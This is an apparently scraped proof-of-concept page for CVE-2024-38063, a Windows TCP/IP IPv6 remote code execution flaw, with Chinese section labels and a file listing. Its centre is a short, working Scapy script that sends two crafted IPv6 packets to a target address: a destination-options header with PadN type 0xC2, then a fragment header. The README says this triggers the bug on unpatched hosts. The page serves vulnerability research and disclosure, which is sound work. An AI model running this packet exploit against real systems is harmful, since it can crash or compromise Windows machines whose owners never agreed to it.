来源

关联漏洞

介绍

# CVE-2024-38063

## Overview

In August 2024, Microsoft released a patch for a Windows TCP/IP Remote Code Execution (RCE) vulnerability. Some researchers have already published Proofs of Concept(PoC) for this vulnerability, and around the same time, PatchPoint researchers also completed their analysis and reproduction of this issue.
Due to the spread of misinformation across various platforms, including Twitter, it appears that the critical points required to trigger this vulnerability have been misunderstood. Contrary to these inaccuracies, we have decided to release a PoC that demonstrates how this vulnerability can be triggered with the transmission of only two packets.; In reality, a large number of packets is not necessary to trigger this vulnerability.


## PoC

```python
from scapy.all import *
IPAddr  = '' # fe80::XXXX:XXXX:XXXX:XXXX
MACAddr = '' # XX:XX:XX:XX:XX:XX
ExtHdrDestOpt  = Ether(dst=MACAddr) / IPv6(fl=1, dst=IPAddr) / IPv6ExtHdrDestOpt(options=[PadN(otype=0xC2)])
ExtHdrFragment = Ether(dst=MACAddr) / IPv6(fl=1, dst=IPAddr) / IPv6ExtHdrFragment()
sendp([ExtHdrDestOpt, ExtHdrFragment], verbose=False)
```


## PCAP

![pcap](https://github.com/user-attachments/assets/30d87bc0-dde0-42f0-bfd2-08e6555623e4)


## DEMO

[CVE-2024-38063_Demo.mp4](https://github.com/user-attachments/assets/f6fe931b-94af-4b77-8be4-654b79f49bc2)


※ To trigger the vulnerability, a waiting time of approximately 60 seconds is required


## Reference

- https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-38063

文件快照

 [4.0K]  /data/pocs/01ba004d9910560091077a5aacfb93022df0fe72
├── [ 348]  CVE-2024-38063_PoC.py
├── [ 510]  packet.pcap
└── [1.5K]  README.md

0 directories, 3 files

备注